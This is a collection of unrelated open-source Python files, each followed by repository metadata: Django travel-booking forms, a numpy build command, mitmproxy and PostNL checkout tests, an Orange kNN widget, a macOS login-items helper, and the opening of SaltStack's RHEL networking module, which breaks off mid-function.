## Options disponibles pour l'heure
# Permet de demander à l'utilisateur s'il veut partir après ou arriver
# avant l'heure qu'il spécifie.
TIME_OPTIONS = [
('DEPART_AFTER', 'Partir après'),
('ARRIVE_BEFORE', 'Arriver avant')
]
## Champ indiquant le nom de la gare de départ.
startStation = forms.CharField(max_length=40, required=True,
validators=[validate_station])
## Champ indiquant le nom de la gare d'arrivée.
endStation = forms.CharField(max_length=40, required=True,
validators=[validate_station])
## Champ indiquant la date souhaitée du voyage.
travelDate = forms.DateField(required=True)
## Champ utilisé pour les options de l'heure (voir TIME_OPTIONS).
timeOptions = forms.ChoiceField(choices=TIME_OPTIONS)
## Champ utilisé pour la sélection du créneau horaire.
hour = forms.ChoiceField(choices=[(str(i), str(i)) for i in range(5, 22)])
def __init__(self, *args, **kwargs):
"""Instancier un formulaire de recherche."""
ps = kwargs.pop('passengers')
super(SearchForm, self).__init__(*args, **kwargs)
passengers = forms.MultipleChoiceField(
required=len(ps) > 0, choices=[(str(p.id), str(p)) for p in ps])
class SignUpForm(UserCreationForm):
"""Formulaire d'inscription à l'application."""
## Champ du prénom de l'utilisateur
first_name = forms.CharField(max_length=30, required=False,
help_text='Optional.')
## Champ du nom de l'utilisateur
last_name = forms.CharField(max_length=30, required=False,
help_text='Optional.')
## Champ pour l'adresse e-mail de l'utilisateur
email = forms.EmailField(
max_length=254, help_text='Required. Inform a valid email address.')
class Meta:
"""Métadonnées du formulaire d'inscription à l'application."""
## Modèle associé au formulaire.
model = User
## Indiquer les champs du formulaire.
# Permet d'hériter automatiquement des champs depuis le formulaire
# par défaut pour l'utilisateur Django.
fields = ('username', 'first_name', 'last_name', 'email', 'password1',
'password2', )
class UserForm(forms.ModelForm):
"""Formulaire de mise à jour d'un profil utilisateur."""
class Meta:
"""Métadonnées du formulaire de mise à jour d'utilisateur."""
## Modèle associé au formulaire.
model = User
## Champs associés au formulaire.
# Permet d'hériter automatiquement des champs depuis le formulaire
# par défaut pour l'utilisateur Django.
fields = ('first_name', 'last_name', 'email', 'password')
class PassengerForm(forms.ModelForm):
"""Formulaire de mise à jour d'un passager """
## Champ du prénom du passager
first_name = forms.CharField(max_length=30, required=True)
## Champ du nom du passager
last_name = forms.CharField(max_length=30, required=True)
class Meta:
"""Métadonnées du formulaire de mise à jour d'un passager"""
## Modèle associé au formulaire.
model = Passenger
##Champs associés au formulaire.
fields = ('first_name', 'last_name')
|
DjangoChained/TchouTchouGo
|
main/forms.py
|
Python
|
agpl-3.0
| 3,957
|
from __future__ import division, absolute_import, print_function
import sys
from setuptools.command.egg_info import egg_info as _egg_info
class egg_info(_egg_info):
def run(self):
if 'sdist' in sys.argv:
import warnings
warnings.warn("`build_src` is being run, this may lead to missing "
"files in your sdist! See numpy issue gh-7127 for "
"details", UserWarning)
# We need to ensure that build_src has been executed in order to give
# setuptools' egg_info command real filenames instead of functions which
# generate files.
self.run_command("build_src")
_egg_info.run(self)
|
JFriel/honours_project
|
venv/lib/python2.7/site-packages/numpy/distutils/command/egg_info.py
|
Python
|
gpl-3.0
| 708
|
from mitmproxy.contentviews import query
from mitmproxy.coretypes import multidict
from . import full_eval
def test_view_query():
d = ""
v = full_eval(query.ViewQuery())
f = v(d, query=multidict.MultiDict([("foo", "bar"), ("foo", "baz")]))
assert f[0] == "Query"
assert f[1] == [[("header", "foo: "), ("text", "bar")], [("header", "foo: "), ("text", "baz")]]
assert v(d) == ("Query", [])
|
vhaupert/mitmproxy
|
test/mitmproxy/contentviews/test_query.py
|
Python
|
mit
| 415
|
import datetime
import decimal
from django.test import TestCase
from django.core.cache import cache
from httmock import HTTMock
from django_dynamic_fixture import G, N
from postnl_checkout.contrib.django_postnl_checkout.models import Order
from .base import PostNLTestMixin
class OrderTests(PostNLTestMixin, TestCase):
""" Tests for Order model. """
maxDiff = None
def setUp(self):
super(OrderTests, self).setUp()
self.order_datum = datetime.datetime(
year=2011, month=7, day=21,
hour=20, minute=11, second=0
)
self.verzend_datum = datetime.datetime(
year=2011, month=7, day=22,
hour=20, minute=11, second=0
)
def test_save(self):
""" Test saving an Order model. """
instance = N(Order)
instance.clean()
instance.save()
def test_prepare_order(self):
""" Test prepare_order class method. """
# Setup mock response
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('prepare_order_request.xml')
)
return self.read_file('prepare_order_response.xml')
kwargs = {
'AangebodenBetaalMethoden': {
'PrepareOrderBetaalMethode': {
'Code': 'IDEAL',
'Prijs': '5.00'
}
},
'AangebodenCommunicatieOpties': {
'PrepareOrderCommunicatieOptie': {
'Code': 'NEWS'
}
},
# FIXME: the following is not submitted by SUDS
# Most probably because it is not properly defined in the WSDL
# Contact PostNL about this.
# 'AangebodenOpties': {
# 'PrepareOrderOptie': {
# 'Code': 'WRAP',
# 'Prijs': '2.50'
# }
# },
# 'AfleverOpties': {
# 'AfleverOptie': {
# 'Code': 'PG',
# 'Kosten': '0.00',
# 'Toegestaan': True
# }
# },
'Consument': {
'ExtRef': 'test@e-id.nl'
},
'Contact': {
'Url': 'http://www.kadowereld.nl/url/contact'
},
'Order': {
'ExtRef': '1105_900',
'OrderDatum': self.order_datum,
'Subtotaal': '125.00',
'VerzendDatum': self.verzend_datum,
'VerzendKosten': '12.50'
},
'Retour': {
'BeschrijvingUrl': 'http://www.kadowereld.nl/url/beschrijving',
'PolicyUrl': 'http://www.kadowereld.nl/url/policy',
'RetourTermijn': 28,
'StartProcesUrl': 'http://www.kadowereld.nl/url/startproces'
},
'Service': {
'Url': 'http://www.kadowereld.nl/url/service'
}
}
# Execute API call
with HTTMock(response):
instance = Order.prepare_order(**kwargs)
# Assert model field values
self.assertTrue(instance.pk)
self.assertEquals(
instance.order_token, '0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
self.assertEquals(
instance.order_ext_ref, '1105_900'
)
self.assertEquals(
instance.order_date, self.order_datum
)
# Assert JSON values
self.assertEquals(instance.prepare_order_request, kwargs)
self.assertEquals(instance.prepare_order_response, {
'Checkout': {
'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c',
'Url': (
'http://tpppm-test.e-id.nl/Orders/OrderCheckout'
'?token=0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
},
'Webshop': {
'IntRef': 'a0713e4083a049a996c302f48bb3f535'
}
})
def test_read_order(self):
""" Test read_order method. """
# Setup mock response
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('read_order_request.xml')
)
return self.read_file('read_order_response.xml')
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
# Read order data
with HTTMock(response):
new_instance = instance.read_order()
response_data = new_instance.read_order_response
self.assertTrue(response_data)
self.assertEquals(response_data, {
'Voorkeuren': {
'Bezorging': {
'Tijdvak': {
'Start': u'10:30',
'Eind': u'08:30'
},
'Datum': datetime.datetime(2012, 4, 26, 0, 0)
}
},
'Consument': {
'GeboorteDatum': datetime.datetime(1977, 6, 15, 0, 0),
'ExtRef': u'jjansen',
'TelefoonNummer': u'06-12345678',
'Email': u'j.jansen@e-id.nl'
},
'Facturatie': {
'Adres': {
'Huisnummer': u'1',
'Initialen': u'J',
'Geslacht': u'Meneer',
'Deurcode': None,
'Gebruik': u'P',
'Gebouw': None,
'Verdieping': None,
'Achternaam': u'Jansen',
'Afdeling': None,
'Regio': None,
'Land': u'NL',
'Wijk': None,
'Postcode': u'4131LV',
'Straat': 'Lage Biezenweg',
'Bedrijf': None,
'Plaats': u'Vianen',
'Tussenvoegsel': None,
'Voornaam': u'Jan',
'HuisnummerExt': None
}
},
'Webshop': {
'IntRef': u'a0713e4083a049a996c302f48bb3f535'
},
'CommunicatieOpties': {
'ReadOrderResponseCommunicatieOptie': [
{
'Text': u'Do not deliver to neighbours',
'Code': u'REMARK'
}
]
},
'Bezorging': {
'ServicePunt': {
'Huisnummer': None,
'Initialen': None,
'Geslacht': None,
'Deurcode': None,
'Gebruik': None,
'Gebouw': None,
'Verdieping': None,
'Achternaam': None,
'Afdeling': None,
'Regio': None,
'Land': None,
'Wijk': None,
'Postcode': None,
'Straat': None,
'Bedrijf': None,
'Plaats': None,
'Tussenvoegsel': None,
'Voornaam': None,
'HuisnummerExt': None
},
'Geadresseerde': {
'Huisnummer': u'1',
'Initialen': u'J',
'Geslacht': u'Meneer',
'Deurcode': None,
'Gebruik': u'Z',
'Gebouw': None,
'Verdieping': None,
'Achternaam': u'Janssen',
'Afdeling': None,
'Regio': None,
'Land': u'NL',
'Wijk': None,
'Postcode': u'4131LV',
'Straat': u'Lage Biezenweg ',
'Bedrijf': u'E-ID',
'Plaats': u'Vianen',
'Tussenvoegsel': None,
'Voornaam': u'Jan',
'HuisnummerExt': None
}
},
'Opties': {
'ReadOrderResponseOpties': [
{
'Text': u'Congratulat ions with your new foobar!',
'Code': u'CARD',
'Prijs': decimal.Decimal('2.00')
}
]
},
'Order': {
'ExtRef': u'15200_001'
},
'BetaalMethode': {
'Optie': u'0021',
'Code': u'IDEAL',
'Prijs': decimal.Decimal('0.00')
}
})
def test_confirm_order(self):
""" Test confirm_order """
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('confirm_order_request.xml')
)
return self.read_file('confirm_order_response.xml')
kwargs = {
'Order': {
'PaymentTotal': decimal.Decimal('183.25')
}
}
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c',
order_ext_ref='1105_900'
)
# Execute API call
with HTTMock(response):
instance.confirm_order(**kwargs)
def test_update_order(self):
""" Test update_order """
def response_success(url, request):
self.assertXMLEqual(
request.body, self.read_file('update_order_request.xml')
)
return self.read_file('update_order_response_success.xml')
def response_fail(url, request):
self.assertXMLEqual(
request.body, self.read_file('update_order_request.xml')
)
return self.read_file('update_order_response_fail.xml')
kwargs = {
'Order': {
'ExtRef': 'FDK004',
'Zending': {
'UpdateOrderOrderZending': {
'Busstuk': {
'UpdateOrderOrderZendingBusstuk': {
'Verzonden': '23-08-2011 12:00:00'
}
},
'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df',
'Pakket': {
'UpdateOrderOrderZendingPakket': {
'Barcode': '3s123456789',
'Postcode': '4131LV'
}
}
}
}
}
}
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c',
order_ext_ref='1105_900'
)
# Make call fail
with HTTMock(response_fail):
self.assertRaises(
Exception, lambda: instance.update_order(**kwargs)
)
# Make call pass
with HTTMock(response_success):
response = instance.update_order(**kwargs)
self.assertTrue(response)
# Make sure the requested stuff is saved
self.assertEquals(
instance.update_order_request, {
'Checkout': {
'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c'
},
'Order': {
'ExtRef': 'FDK004',
'Zending': {
'UpdateOrderOrderZending': {
'Busstuk': {
'UpdateOrderOrderZendingBusstuk': {
'Verzonden': '23-08-2011 12:00:00'
}
},
'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df',
'Pakket': {
'UpdateOrderOrderZendingPakket': {
'Barcode': '3s123456789',
'Postcode': '4131LV'
}
}
}
}
}
}
)
def test_ping_status(self):
""" Test ping_status """
instance = G(Order)
self.response_called = 0
def ok_response(url, request):
# Assert
self.assertXMLEqual(
request.body,
self.read_file('ping_status_request.xml')
)
self.response_called += 1
return self.read_file('ping_status_response_ok.xml')
def nok_response(url, request):
return self.read_file('ping_status_response_nok.xml')
with HTTMock(ok_response):
self.assertEquals(instance.ping_status(), True)
self.assertEquals(self.response_called, 1)
# Repeated call should not cause the response to be called
with HTTMock(ok_response):
self.assertEquals(instance.ping_status(), True)
self.assertEquals(self.response_called, 1)
# Clear cache
cache.clear()
with HTTMock(nok_response):
self.assertEquals(instance.ping_status(), False)
|
dokterbob/python-postnl-checkout
|
tests/test_django.py
|
Python
|
agpl-3.0
| 13,320
|
import numpy as np
import geopy
from map import Map
class Greengraph(object):
def __init__(self, start, end):
self.start=start
self.end=end
self.geocoder=geopy.geocoders.GoogleV3(domain="maps.google.co.uk")
def geolocate(self, place):
return self.geocoder.geocode(place, exactly_one=False)[0][1]
def location_sequence(self, start,end,steps):
lats = np.linspace(start[0], end[0], steps)
longs = np.linspace(start[1],end[1], steps)
return np.vstack([lats, longs]).transpose()
def green_between(self, steps):
return [Map(*location).count_green()
for location in self.location_sequence(
self.geolocate(self.start),
self.geolocate(self.end),
steps)]
|
simonschaal/greengraph
|
greengraph/graph.py
|
Python
|
mit
| 813
|
"""
"""
import Orange.data
import Orange.regression.knn as knn
import Orange.classification
from Orange.preprocess.preprocess import Preprocess
from Orange.widgets import widget, gui
from Orange.widgets.settings import Setting
class OWKNNRegression(widget.OWWidget):
name = "k Nearest Neighbors Regression"
description = "K-nearest neighbours learner/model."
icon = "icons/kNearestNeighbours.svg"
priority = 20
inputs = [("Data", Orange.data.Table, "set_data"),
("Preprocessor", Preprocess, "set_preprocessor")]
outputs = [("Learner", knn.KNNRegressionLearner),
("Predictor", Orange.classification.SklModel)]
want_main_area = False
learner_name = Setting("k Nearest Neighbors Regression")
n_neighbors = Setting(5)
metric_index = Setting(0)
def __init__(self, parent=None):
super().__init__(parent)
self.preprocessors = ()
self.data = None
box = gui.widgetBox(self.controlArea, "Learner/Model Name")
gui.lineEdit(box, self, "learner_name")
box = gui.widgetBox(self.controlArea, "Neighbors")
gui.spin(box, self, "n_neighbors", 1, 100, label="Number of neighbors")
box = gui.widgetBox(box, "Metric")
box.setFlat(True)
box.layout().setContentsMargins(0, 0, 0, 0)
gui.comboBox(box, self, "metric_index",
items=["Euclidean", "Manhattan", "Maximal", "Mahalanobis"])
self.metrics = ["euclidean", "manhattan", "chebyshev", "mahalanobis"]
gui.button(self.controlArea, self, "Apply",
callback=self.apply, default=True)
layout = self.layout()
self.layout().setSizeConstraint(layout.SetFixedSize)
self.apply()
def set_data(self, data):
"""Set input training dataset."""
self.data = data
if data is not None:
self.apply()
def set_preprocessor(self, preproc):
"""Set preprocessor to apply on training data."""
if preproc is None:
self.preprocessors = None
else:
self.preprocessors = (preproc,)
self.apply()
def apply(self):
"""
Construct the learner and apply it on the training data if available.
"""
learner = knn.KNNRegressionLearner(
n_neighbors=self.n_neighbors,
metric=self.metrics[self.metric_index],
preprocessors=self.preprocessors
)
learner.name = self.learner_name
model = None
if self.data is not None:
model = learner(self.data)
model.name = self.learner_name
self.send("Learner", learner)
self.send("Predictor", model)
|
qusp/orange3
|
Orange/widgets/regression/owknnregression.py
|
Python
|
bsd-2-clause
| 2,723
|
from math import *
from PyQt4 import QtCore
def mySquare (val) :
return (sqrt(val))
"""Function will take the name of an image file and then get
the range of images that associate with that image name. """
def getImageRange (imageDir, imstring) :
# get the index of the start of the .txt suffix then
# find the start of the _xxx where xxx are the image numbers
qd = QtCore.QDir (imageDir)
qd.setNameFilters (QtCore.QStringList()<<"*.tif")
filelist = qd.entryList()
nfiles = filelist.count()
min = 1e6
max = -1e6
lastind = imstring.lastIndexOf('.tif')-3
firstind = imstring.lastIndexOf ("/")
if (firstind <0) :
firstind = imstring.lastIndexOf('\\')
firstind = firstind + 1
matchstring = imstring.mid(firstind, lastind-firstind)
print 'Debug : Matchstring = ',matchstring
for i in range(nfiles) :
print filelist[i]
if not (filelist[i].contains(".tif")) :
continue
if (filelist[i].contains (matchstring)) :
print i, 'made it'
tmpind = filelist[i].lastIndexOf (".tif")
str = filelist[i].mid(tmpind-3,3)
val = str.toInt()
print val[0]
if (val[0] > max) :
max = val[0]
if (val[0] < min) :
min = val[0]
print 'Min max are : ', min, max
tmpind = imstring.lastIndexOf (".tif")
str = imstring.mid(tmpind-3,3)
val = str.toInt()
minmax = [min, max, val[0]]
return minmax
|
kirillzhuravlev/atrex
|
Software/atrex_utils.py
|
Python
|
lgpl-3.0
| 1,538
|
from Foundation import NSBundle
import halfcaff.util
APPDIR = None
if not halfcaff.util.is_dev_mode():
APPDIR = NSBundle.mainBundle().bundlePath()
def is_login_enabled():
if not APPDIR:
return False
return APPDIR in list_login_items()
def enable_startup_at_login():
add_login_item(APPDIR)
def disable_startup_at_login():
remove_login_item(APPDIR)
#### From https://github.com/pudquick/pyLoginItems/
# /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Headers/LSSharedFileList.h
# Fun things:
# kLSSharedFileListFavoriteItems
# kLSSharedFileListFavoriteVolumes
# kLSSharedFileListRecentApplicationItems
# kLSSharedFileListRecentDocumentItems
# kLSSharedFileListRecentServerItems
# kLSSharedFileListSessionLoginItems
# kLSSharedFileListGlobalLoginItems - deprecated in 10.9
# Runs in user space, use this with a login script / launchd item / something running as the user
# Example usage:
#
# import pyLoginItems
# >>> pyLoginItems.list_login_items()
# [u'/Applications/Dropbox.app', u'/Applications/iTunes.app/Contents/MacOS/iTunesHelper.app']
#
# pyLoginItems.add_login_item('/Applications/Safari.app', 0)
# pyLoginItems.remove_login_item('/Applications/TextEdit.app')
from platform import mac_ver
from Foundation import NSURL
from LaunchServices import kLSSharedFileListSessionLoginItems, kLSSharedFileListNoUserInteraction
# Need to manually load in 10.11.x+
os_vers = int(mac_ver()[0].split('.')[1])
if os_vers > 10:
from Foundation import NSBundle
import objc
SFL_bundle = NSBundle.bundleWithIdentifier_('com.apple.coreservices.SharedFileList')
functions = [('LSSharedFileListCreate', '^{OpaqueLSSharedFileListRef=}^{__CFAllocator=}^{__CFString=}@'),
('LSSharedFileListCopySnapshot', '^{__CFArray=}^{OpaqueLSSharedFileListRef=}o^I'),
('LSSharedFileListItemCopyDisplayName', '^{__CFString=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemResolve', 'i^{OpaqueLSSharedFileListItemRef=}Io^^{__CFURL=}o^{FSRef=[80C]}'),
('LSSharedFileListItemMove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemRemove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListInsertItemURL', '^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{__CFString=}^{OpaqueIconRef=}^{__CFURL=}^{__CFDictionary=}^{__CFArray=}'),
('kLSSharedFileListItemBeforeFirst', '^{OpaqueLSSharedFileListItemRef=}'),
('kLSSharedFileListItemLast', '^{OpaqueLSSharedFileListItemRef=}'),]
objc.loadBundleFunctions(SFL_bundle, globals(), functions)
else:
from LaunchServices import kLSSharedFileListItemBeforeFirst, kLSSharedFileListItemLast, \
LSSharedFileListCreate, LSSharedFileListCopySnapshot, \
LSSharedFileListItemCopyDisplayName, LSSharedFileListItemResolve, \
LSSharedFileListItemMove, LSSharedFileListItemRemove, \
LSSharedFileListInsertItemURL
def _get_login_items():
# Setup the type of shared list reference we want
list_ref = LSSharedFileListCreate(None, kLSSharedFileListSessionLoginItems, None)
# Get the user's login items - actually returns two values, with the second being a seed value
# indicating when the snapshot was taken (which is safe to ignore here)
login_items,_ = LSSharedFileListCopySnapshot(list_ref, None)
return [list_ref, login_items]
def _get_item_cfurl(an_item, flags=None):
if flags is None:
# Attempt to resolve the items without interacting or mounting
flags = kLSSharedFileListNoUserInteraction + kLSSharedFileListNoUserInteraction
err, a_CFURL, a_FSRef = LSSharedFileListItemResolve(an_item, flags, None, None)
return a_CFURL
def list_login_items():
# Attempt to find the URLs for the items without mounting drives
URLs = []
for an_item in _get_login_items()[1]:
URLs.append(_get_item_cfurl(an_item).path())
return URLs
def remove_login_item(path_to_item):
current_paths = list_login_items()
if path_to_item in current_paths:
list_ref, current_items = _get_login_items()
i = current_paths.index(path_to_item)
target_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, target_item)
def add_login_item(path_to_item, position=-1):
# position:
# 0..N: Attempt to insert at that index position, with 0 being first
# -1: Insert as last item
# Note:
# If the item is already present in the list, it will get moved to the new location automatically.
list_ref, current_items = _get_login_items()
added_item = NSURL.fileURLWithPath_(path_to_item)
if position == 0:
# Seems to be buggy, will force it below
destination_point = kLSSharedFileListItemBeforeFirst
elif position == -1:
destination_point = kLSSharedFileListItemLast
elif position >= len(current_items):
# At or beyond to the end of the current list
position = -1
destination_point = kLSSharedFileListItemLast
else:
# 1 = after item 0, 2 = after item 1, etc.
destination_point = current_items[position - 1]
# The logic for LSSharedFileListInsertItemURL is generally fine when the item is not in the list
# already (with the exception of kLSSharedFileListItemBeforeFirst which appears to be broken, period)
# However, if the item is already in the list, the logic gets really really screwy.
# Your index calculations are invalidated by OS X because you shift an item, possibly shifting the
# indexes of other items in the list.
# It's easier to just remove it first, then re-add it.
current_paths = list_login_items()
if (len(current_items) == 0) or (position == -1):
# Either there's nothing there or it wants to be last
# Just add the item, it'll be fine
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
elif (position == 0):
# Special case - kLSSharedFileListItemBeforeFirst appears broken on (at least) 10.9
# Remove if already in the list
if path_to_item in current_paths:
i = current_paths.index(path_to_item)
old_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, old_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
if (len(current_items) == 0):
# Simple case if nothing remains in the list
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
else:
# At least one item remains.
# The fix for the bug is:
# - Add our item after the first ('needs_fixing') item
# - Move the 'needs_fixing' item to the end
# - Move the 'needs_fixing' item after our added item (which is now first)
needs_fixing = _get_item_cfurl(current_items[0])
# Move our item
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, added_item, {}, [])
if not (result is None):
# Only shift if the first insert worked
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item last
result = LSSharedFileListInsertItemURL(list_ref, kLSSharedFileListItemLast, None, None, needs_fixing, {}, [])
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item back under the new one
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, needs_fixing, {}, [])
else:
# We're aiming for an index based on something else in the list.
# Only do something if we're not aiming at ourselves.
insert_after_path = _get_item_cfurl(destination_point).path()
if (insert_after_path != path_to_item):
# Seems to be a different file
if path_to_item in current_paths:
# Remove our object if it's already present
i = current_paths.index(path_to_item)
self_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, self_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Re-find our original target
current_paths = list_login_items()
i = current_paths.index(insert_after_path)
destination_point = current_items[i]
# Add ourselves after the file
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
|
dougn/HalfCaff
|
halfcaff/login.py
|
Python
|
mit
| 9,234
|
# -*- coding: utf-8 -*-
'''
The networking module for RHEL/Fedora based distros
'''
from __future__ import absolute_import
# Import python libs
import logging
import os.path
import os
# Import third party libs
import jinja2
import jinja2.exceptions
# Import salt libs
import salt.utils
import salt.utils.templates
import salt.utils.validate.net
import salt.ext.six as six
# Set up logging
log = logging.getLogger(__name__)
# Set up template environment
JINJA = jinja2.Environment(
loader=jinja2.FileSystemLoader(
os.path.join(salt.utils.templates.TEMPLATE_DIRNAME, 'rh_ip')
)
)
# Define the module's virtual name
__virtualname__ = 'ip'
def __virtual__():
'''
Confine this module to RHEL/Fedora based distros
'''
if __grains__['os_family'] == 'RedHat':
return __virtualname__
return False
# Setup networking attributes
_ETHTOOL_CONFIG_OPTS = [
'autoneg', 'speed', 'duplex',
'rx', 'tx', 'sg', 'tso', 'ufo',
'gso', 'gro', 'lro'
]
_RH_CONFIG_OPTS = [
'domain', 'peerdns', 'peerntp', 'defroute',
'mtu', 'static-routes', 'gateway', 'zone'
]
_RH_CONFIG_BONDING_OPTS = [
'mode', 'miimon', 'arp_interval',
'arp_ip_target', 'downdelay', 'updelay',
'use_carrier', 'lacp_rate', 'hashing-algorithm',
'max_bonds', 'tx_queues', 'num_grat_arp',
'num_unsol_na', 'primary', 'primary_reselect',
'ad_select', 'xmit_hash_policy', 'arp_validate',
'fail_over_mac', 'all_slaves_active', 'resend_igmp'
]
_RH_NETWORK_SCRIPT_DIR = '/etc/sysconfig/network-scripts'
_RH_NETWORK_FILE = '/etc/sysconfig/network'
_RH_NETWORK_CONF_FILES = '/etc/modprobe.d'
_CONFIG_TRUE = ['yes', 'on', 'true', '1', True]
_CONFIG_FALSE = ['no', 'off', 'false', '0', False]
_IFACE_TYPES = [
'eth', 'bond', 'alias', 'clone',
'ipsec', 'dialup', 'bridge', 'slave', 'vlan',
'ipip', 'ib',
]
def _error_msg_iface(iface, option, expected):
'''
Build an appropriate error message from a given option and
a list of expected values.
'''
msg = 'Invalid option -- Interface: {0}, Option: {1}, Expected: [{2}]'
return msg.format(iface, option, '|'.join(expected))
def _error_msg_routes(iface, option, expected):
'''
Build an appropriate error message from a given option and
a list of expected values.
'''
msg = 'Invalid option -- Route interface: {0}, Option: {1}, Expected: [{2}]'
return msg.format(iface, option, expected)
def _log_default_iface(iface, opt, value):
msg = 'Using default option -- Interface: {0} Option: {1} Value: {2}'
log.info(msg.format(iface, opt, value))
def _error_msg_network(option, expected):
'''
Build an appropriate error message from a given option and
a list of expected values.
'''
msg = 'Invalid network setting -- Setting: {0}, Expected: [{1}]'
return msg.format(option, '|'.join(expected))
def _log_default_network(opt, value):
msg = 'Using existing setting -- Setting: {0} Value: {1}'
log.info(msg.format(opt, value))
def _parse_rh_config(path):
rh_config = _read_file(path)
cv_rh_config = {}
if rh_config:
for line in rh_config:
line = line.strip()
if len(line) == 0 or line.startswith('!') or line.startswith('#'):
continue
pair = [p.rstrip() for p in line.split('=', 1)]
if len(pair) != 2:
continue
name, value = pair
cv_rh_config[name.upper()] = value
return cv_rh_config
def _parse_ethtool_opts(opts, iface):
'''
Filters given options and outputs valid settings for ETHTOOLS_OPTS
If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
config = {}
if 'autoneg' in opts:
if opts['autoneg'] in _CONFIG_TRUE:
config.update({'autoneg': 'on'})
elif opts['autoneg'] in _CONFIG_FALSE:
config.update({'autoneg': 'off'})
else:
_raise_error_iface(iface, 'autoneg', _CONFIG_TRUE + _CONFIG_FALSE)
if 'duplex' in opts:
valid = ['full', 'half']
if opts['duplex'] in valid:
config.update({'duplex': opts['duplex']})
else:
_raise_error_iface(iface, 'duplex', valid)
if 'speed' in opts:
valid = ['10', '100', '1000', '10000']
if str(opts['speed']) in valid:
config.update({'speed': opts['speed']})
else:
_raise_error_iface(iface, opts['speed'], valid)
valid = _CONFIG_TRUE + _CONFIG_FALSE
for option in ('rx', 'tx', 'sg', 'tso', 'ufo', 'gso', 'gro', 'lro'):
if option in opts:
if opts[option] in _CONFIG_TRUE:
config.update({option: 'on'})
elif opts[option] in _CONFIG_FALSE:
config.update({option: 'off'})
else:
_raise_error_iface(iface, option, valid)
return config
def _parse_settings_bond(opts, iface):
'''
Filters given options and outputs valid settings for requested
operation. If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
bond_def = {
# 803.ad aggregation selection logic
# 0 for stable (default)
# 1 for bandwidth
# 2 for count
'ad_select': '0',
# Max number of transmit queues (default = 16)
'tx_queues': '16',
# Link monitoring in milliseconds. Most NICs support this
'miimon': '100',
# ARP interval in milliseconds
'arp_interval': '250',
# Delay before considering link down in milliseconds (miimon * 2)
'downdelay': '200',
# lacp_rate 0: Slow - every 30 seconds
# lacp_rate 1: Fast - every 1 second
'lacp_rate': '0',
# Max bonds for this driver
'max_bonds': '1',
# Specifies the time, in milliseconds, to wait before
# enabling a slave after a link recovery has been
# detected. Only used with miimon.
'updelay': '0',
# Used with miimon.
# On: driver sends mii
# Off: ethtool sends mii
'use_carrier': 'on',
# Default. Don't change unless you know what you are doing.
'xmit_hash_policy': 'layer2',
}
if opts['mode'] in ['balance-rr', '0']:
log.info(
'Device: {0} Bonding Mode: load balancing (round-robin)'.format(
iface
)
)
return _parse_settings_bond_0(opts, iface, bond_def)
elif opts['mode'] in ['active-backup', '1']:
log.info(
'Device: {0} Bonding Mode: fault-tolerance (active-backup)'.format(
iface
)
)
return _parse_settings_bond_1(opts, iface, bond_def)
elif opts['mode'] in ['balance-xor', '2']:
log.info(
'Device: {0} Bonding Mode: load balancing (xor)'.format(iface)
)
return _parse_settings_bond_2(opts, iface, bond_def)
elif opts['mode'] in ['broadcast', '3']:
log.info(
'Device: {0} Bonding Mode: fault-tolerance (broadcast)'.format(
iface
)
)
return _parse_settings_bond_3(opts, iface, bond_def)
elif opts['mode'] in ['802.3ad', '4']:
log.info(
'Device: {0} Bonding Mode: IEEE 802.3ad Dynamic link '
'aggregation'.format(iface)
)
return _parse_settings_bond_4(opts, iface, bond_def)
elif opts['mode'] in ['balance-tlb', '5']:
log.info(
'Device: {0} Bonding Mode: transmit load balancing'.format(iface)
)
return _parse_settings_bond_5(opts, iface, bond_def)
elif opts['mode'] in ['balance-alb', '6']:
log.info(
'Device: {0} Bonding Mode: adaptive load balancing'.format(iface)
)
return _parse_settings_bond_6(opts, iface, bond_def)
else:
valid = [
'0', '1', '2', '3', '4', '5', '6',
'balance-rr', 'active-backup', 'balance-xor',
'broadcast', '802.3ad', 'balance-tlb', 'balance-alb'
]
_raise_error_iface(iface, 'mode', valid)
def _parse_settings_bond_0(opts, iface, bond_def):
'''
Filters given options and outputs valid settings for bond0.
If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
bond = {'mode': '0'}
# ARP targets in n.n.n.n form
valid = ['list of ips (up to 16)']
if 'arp_ip_target' in opts:
if isinstance(opts['arp_ip_target'], list):
if 1 <= len(opts['arp_ip_target']) <= 16:
bond.update({'arp_ip_target': ''})
for ip in opts['arp_ip_target']: # pylint: disable=C0103
if len(bond['arp_ip_target']) > 0:
